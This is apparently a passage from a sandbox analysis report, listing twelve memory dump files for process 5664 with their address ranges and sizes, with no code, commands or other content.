                                                                                                                                                                                • memory/5664-5873-0x0000000007700000-0x000000000770E000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  56KB

                                                                                                                                                                                • memory/5664-5874-0x0000000007710000-0x0000000007725000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  84KB

                                                                                                                                                                                • memory/5664-5875-0x0000000007760000-0x000000000777A000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  104KB

                                                                                                                                                                                • memory/5664-5869-0x00000000076E0000-0x00000000076F1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  68KB

                                                                                                                                                                                • memory/5664-5863-0x0000000007670000-0x000000000767A000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40KB

                                                                                                                                                                                • memory/5664-5851-0x0000000007C70000-0x00000000082EA000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6.5MB

                                                                                                                                                                                • memory/5664-5848-0x0000000007500000-0x00000000075A4000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  656KB

                                                                                                                                                                                • memory/5664-5896-0x0000000007920000-0x0000000007928000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  32KB

                                                                                                                                                                                • memory/5664-5838-0x000000006E1C0000-0x000000006E517000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3.3MB

                                                                                                                                                                                • memory/5664-5847-0x00000000074E0000-0x00000000074FE000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  120KB

                                                                                                                                                                                • memory/5664-5836-0x00000000074A0000-0x00000000074D4000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  208KB

                                                                                                                                                                                • memory/5664-5785-0x0000000007040000-0x0000000007086000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  280KB